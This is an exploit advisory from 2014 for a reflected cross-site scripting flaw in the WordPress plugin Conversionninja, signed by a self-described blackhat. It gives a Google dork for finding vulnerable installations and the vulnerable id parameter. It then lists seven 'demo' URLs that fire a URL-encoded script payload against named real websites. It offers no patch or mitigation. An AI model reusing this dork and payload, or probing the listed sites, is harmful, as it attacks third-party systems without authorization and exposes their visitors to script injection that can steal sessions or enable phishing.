[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Plugin Conversionninja Cross Site Scripting
[+]
[+] Exploit Author: Ashiyane Digital Security Team
[+]
[+] Date: 2014-05-22
[+]
[+] Google Dork : inurl:wp-content/plugins/conversionninja
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Windows 7 , Mozilla FireFox
[+]
[+] Discovered By : Milad Hacking
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+]  Location :
[localhost]/wp-content/plugins/conversionninja/lp/index.php?id=[XSS]

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Demo :

http://mlm18.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://www.digitaler-kabelanschluss.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://www.schwarzer-adler-feucht.de/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://bestvertrieb.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://gratis-webinare.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://www.salsa-online-academy.com/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E

http://dasleadsystem.eu/wp-content/plugins/conversionninja/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E


[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Discovered By : Milad Hacking

We Love Mohammad

Mail : milad.hacking.blackhat@gmail.com

Home Page : https://www.facebook.com/milad.hacking.5

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]